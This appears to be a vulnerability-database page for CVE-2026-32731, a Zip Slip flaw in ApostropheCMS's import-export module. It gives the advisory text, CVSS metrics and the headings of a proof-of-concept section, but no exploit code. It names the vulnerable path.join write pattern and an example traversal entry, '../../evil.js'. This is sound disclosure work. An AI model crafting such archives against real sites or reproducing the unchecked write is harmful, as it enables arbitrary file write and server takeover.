      "value": "ApostropheCMS is an open-source content management framework. Prior to version 3.5.3 of `@apostrophecms/import-export`,\nThe `extract()` function in `gzip.js` constructs file-write paths using `fs.createWriteStream(path.join(exportPath, header.name))`. `path.join()` does not resolve or sanitise traversal segments such as `../`. It concatenates them as-is, meaning a tar entry named `../../evil.js` resolves to a path outside the intended extraction directory. No canonical-path check is performed before the write stream is opened. This is a textbook Zip Slip vulnerability. Any user who has been granted the Global Content Modify permission \u2014 a role routinely assigned to content editors and site managers \u2014 can upload a crafted `.tar.gz` file through the standard CMS import UI and write attacker-controlled content to any path the Node.js process can reach on the host filesystem. Version 3.5.3 of `@apostrophecms/import-export` fixes the issue."
    },
    {
      "lang": "es",
      "value": "ApostropheCMS es un framework de gesti\u00f3n de contenido de c\u00f3digo abierto. Antes de la versi\u00f3n 3.5.3 de `\u0027@apostrophecms/import-export\u0027`, la funci\u00f3n `\u0027extract\u0027`() en `\u0027gzip.js\u0027` construye rutas de escritura de archivos usando `\u0027fs.createWriteStream(path.join(exportPath, header.name))\u0027`. `\u0027path.join\u0027`() no resuelve ni sanitiza segmentos de recorrido como `\u0027../\u0027`. Los concatena tal cual, lo que significa que una entrada tar llamada `\u0027../../evil.js\u0027` se resuelve a una ruta fuera del directorio de extracci\u00f3n previsto. No se realiza ninguna comprobaci\u00f3n de ruta can\u00f3nica antes de que se abra el flujo de escritura. Esta es una vulnerabilidad Zip Slip de libro de texto. Cualquier usuario al que se le haya concedido el permiso de Modificar Contenido Global \u2014 un rol asignado rutinariamente a editores de contenido y administradores de sitios \u2014 puede cargar un archivo \u0027.tar.gz\u0027 manipulado a trav\u00e9s de la interfaz de usuario de importaci\u00f3n est\u00e1ndar del CMS y escribir contenido controlado por el atacante en cualquier ruta que el proceso de Node.js pueda alcanzar en el sistema de archivos del host. La versi\u00f3n 3.5.3 de `\u0027@apostrophecms/import-export\u0027` soluciona el problema."
    }
  ],
  "id": "CVE-2026-32731",
  "lastModified": "2026-03-24T21:31:54.240",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.9,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.1,
        "impactScore": 6.0,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-18T23:17:29.543",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-mwxc-m426-3f78"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-32731 (GCVE-0-2026-32731)

GHSA-MWXC-M426-3F78

Product

Vulnerability Summary

Security Impact

1. Arbitrary File Write

2. Static Web Directory — Defacement & Malicious Asset Injection

3. Persistent Backdoor / RCE (Post-Restart)

4. Credential and Secret File Overwrite

5. Denial of Service

Required Permission

Proof of Concept

PoC 1 — Automated Verification (tmp-import-export-zip-slip-poc.js)

PoC 2 — Web UI Exploitation (make-slip-tar.py)

Steps to Reproduce (Web UI — Real Exploitation)

Step 1 — Create the payload file

Step 2 — Generate the malicious archive

Step 3 — Upload via CMS Import UI

Step 4 — Confirm the write

Video POC : https://drive.google.com/file/d/1bbuQnoJv_xjM_uvfjnstmTh07FB7VqGH/view?usp=sharing

FKIE_CVE-2026-32731

Tags

Sightings

Nomenclature

PoC 1 — Automated Verification (`tmp-import-export-zip-slip-poc.js`)

PoC 2 — Web UI Exploitation (`make-slip-tar.py`)